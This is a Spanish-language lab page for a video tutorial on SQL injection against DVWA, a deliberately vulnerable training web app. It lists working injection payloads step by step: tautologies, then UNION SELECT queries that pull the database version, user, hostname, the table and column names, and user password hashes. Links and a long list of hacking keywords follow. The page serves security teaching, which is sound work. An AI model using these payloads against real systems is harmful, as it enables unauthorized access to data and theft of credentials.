LABORATORIO o TESTEO de PRUEBA
Sentencias o consultas o comandos usados en el videoCódigo: Seleccionar todo
Acceder a base de datos via cli
sudo mysql -u root -p
USE dvwa;
SELECT first_name, last_name FROM users WHERE user_id = '2';
SELECT * FROM users WHERE first_name='Gordon'; -- ' AND password='1111'
------------------------
Ejemplos de obtencion de datos
A - Se obtienen datos del usuario
1
Tambien modificando la url se puede obtener
datos del usuario
http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
SELECT first_name, last_name FROM users WHERE user_id = '3';
B - Obtener toda la info de una tabla
%' or '1'='1
SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';
C - Obtener la version de la base de datos
%' or 0=0 union select null, version() #
test'union select null, version()#
D - Display el usuario de la base de datos. Con que usuario
el lenguaje de programacion hace las consultas a la base de datos
%' or 0=0 union select null, user() #
test'union select null, user()#
E - Mirar el nombre la base de datos donde estan todas las tablas
%' or 0=0 union select null, database() #
test' union select null, database() #
F - Listar todas las tablas que tiene la base de datos
%' and 1=0 union select null, table_name from information_schema.tables #
test' and 1=0 union select null, table_name from information_schema.tables #
G - Display el hostname donde esta alojada la base de datos
' union select null, @@hostname#
H- Todas las columnas de una tabla
test' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
I - Mostrar el contenido de las columans
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #https://softwarelab.org/es/que-es-inyeccion-sql/
https://byte-mind.net/sql-injection-tip ... ramedidas/
https://www.golinuxcloud.com/install-dvwa-kali-linux/
https://nooblinux.com/sql-injection-exp ... sing-dvwa/
https://crackstation.net/
https://stackoverflow.com/questions/528 ... hrough-cli
https://www.f5.com/es_es/services/resou ... n-firewall
https://crackstation.net/
VIDEO TUTORIAL
Pentesting synology xpenology Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell PMKID EAPOL Handshake backdoor LAN | Local Area Network CMD execution RFI LFI How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Macro Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking PowerPoint Access Recuperar contraseña Advanced password recovery DCOM7 Hash wpa wpa2 wpa3 cifrado descrifrar PSK instalacion install Mysql Install DVWA on Kali Linux Step-by-Step Damn Vulnerable Web Application Download o bajar database apache base de datos Cross-Site Request Forgery (CSRF) File Inclusion SQL injection Bruteforce attacks Vulnerabilidades CVE XAMPP Perl MariaDB SQL Injection Exploitation Explanation Examples Using DVWA ¿Qué es inyección SQL? ¿Qué tipos de ataques de inyección SQL Existen? Ejemplos de ataques de inyección SQL Cómo prevenir ataques de inyección SQL Obtener información de la base de datos web application firewall sql mysql queries sentencias consultas oracle macropack,Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,como usar kali linux,comandos,commands,remote function,metasploit,laboratorio,lab,testing,web developers,desarrollador,vulnerabilities
